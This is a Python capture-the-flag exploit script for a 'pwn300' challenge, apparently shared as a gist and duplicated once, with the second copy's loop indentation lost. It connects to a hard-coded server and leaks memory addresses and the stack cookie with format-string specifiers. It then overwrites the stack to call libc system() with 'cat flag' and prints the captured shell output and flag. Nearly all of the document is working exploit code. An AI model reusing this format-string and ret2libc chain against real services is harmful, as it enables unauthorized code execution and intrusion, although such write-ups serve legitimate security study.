balidani/pwn300_exploit.py Secret

## pwn300_exploit.py
import socket
import struct

HOST = '109.233.61.11'
PORT = 3129

# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.recv(1024)

# Log in
s.send("letmein\n")
s.recv(1024)

# Get base address, stack cookie, stack address
s.send("%79$08x %78$08x %10$08x " + "_" * 103 + "\n")
data = s.recv(1024)
base_address = int(data.split(" ")[0], 16) - 0xc10
stack_cookie = int(data.split(" ")[1], 16)
stack_address = int(data.split(" ")[2], 16) - 0x1a8

print "[*] Base address: %08x" % base_address
print "[*] Stack cookie: %08x" % stack_cookie
print "[*] Stack address: %08x" % stack_address

read_addr = base_address - 0xf5c60
sys_addr = read_addr - 0x9ef70
sys_addr_packed = struct.pack("<I", sys_addr)

print "[*] read@libc: %08x" % read_addr
print "[*] system@libc: %08x" % sys_addr

stack_addr_packed = struct.pack("<I", stack_address + 288)
stack_cookie_packed = struct.pack("<I", stack_cookie | 0x41)

payload = "%%0176x" + "_" * 80 + "%s" + "_" * 12 + "%s%s%s____ls -lsa;##\n"
payload = "%%0176x" + "_" * 80 + "%s" + "_" * 12 + "%s%s%s____cat flag;#\n"
s.send(payload % (stack_cookie_packed, sys_addr_packed, sys_addr_packed, stack_addr_packed))
s.recv(1024)
s.recv(1024)

for x in range(13):
    payload_2 = "%0134x " + "_" * 120 + "\n"
    s.send(payload_2)
    s.recv(1024)

print s.recv(1024)

"""
$ ls -lsa
total 20
4 drwxr-xr-x  2 root root 4096 Feb  8 02:50 .
4 drwxr-xr-x 23 root root 4096 Feb  8 02:49 ..
4 -rw-r--r--  1 root root   44 Feb  8 02:49 flag
8 -rwxr-xr-x  1 root root 5464 Feb  8 02:50 task

$ cat flag
CTF{c36d55681410edbba58daedde46fb5e8}
"""
	import socket
	import struct

	HOST = '109.233.61.11'
	PORT = 3129

	# Connect
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((HOST, PORT))
	s.recv(1024)

	# Log in
	s.send("letmein\n")
	s.recv(1024)

	# Get base address, stack cookie, stack address
	s.send("%79$08x %78$08x %10$08x " + "_" * 103 + "\n")
	data = s.recv(1024)
	base_address = int(data.split(" ")[0], 16) - 0xc10
	stack_cookie = int(data.split(" ")[1], 16)
	stack_address = int(data.split(" ")[2], 16) - 0x1a8

	print "[*] Base address: %08x" % base_address
	print "[*] Stack cookie: %08x" % stack_cookie
	print "[*] Stack address: %08x" % stack_address

	read_addr = base_address - 0xf5c60
	sys_addr = read_addr - 0x9ef70
	sys_addr_packed = struct.pack("<I", sys_addr)

	print "[*] read@libc: %08x" % read_addr
	print "[*] system@libc: %08x" % sys_addr

	stack_addr_packed = struct.pack("<I", stack_address + 288)
	stack_cookie_packed = struct.pack("<I", stack_cookie \| 0x41)

	payload = "%%0176x" + "_" * 80 + "%s" + "_" * 12 + "%s%s%s____ls -lsa;##\n"
	payload = "%%0176x" + "_" * 80 + "%s" + "_" * 12 + "%s%s%s____cat flag;#\n"
	s.send(payload % (stack_cookie_packed, sys_addr_packed, sys_addr_packed, stack_addr_packed))
	s.recv(1024)
	s.recv(1024)

	for x in range(13):
	payload_2 = "%0134x " + "_" * 120 + "\n"
	s.send(payload_2)
	s.recv(1024)

	print s.recv(1024)

	"""
	$ ls -lsa
	total 20
	4 drwxr-xr-x 2 root root 4096 Feb 8 02:50 .
	4 drwxr-xr-x 23 root root 4096 Feb 8 02:49 ..
	4 -rw-r--r-- 1 root root 44 Feb 8 02:49 flag
	8 -rwxr-xr-x 1 root root 5464 Feb 8 02:50 task

	$ cat flag
	CTF{c36d55681410edbba58daedde46fb5e8}
	"""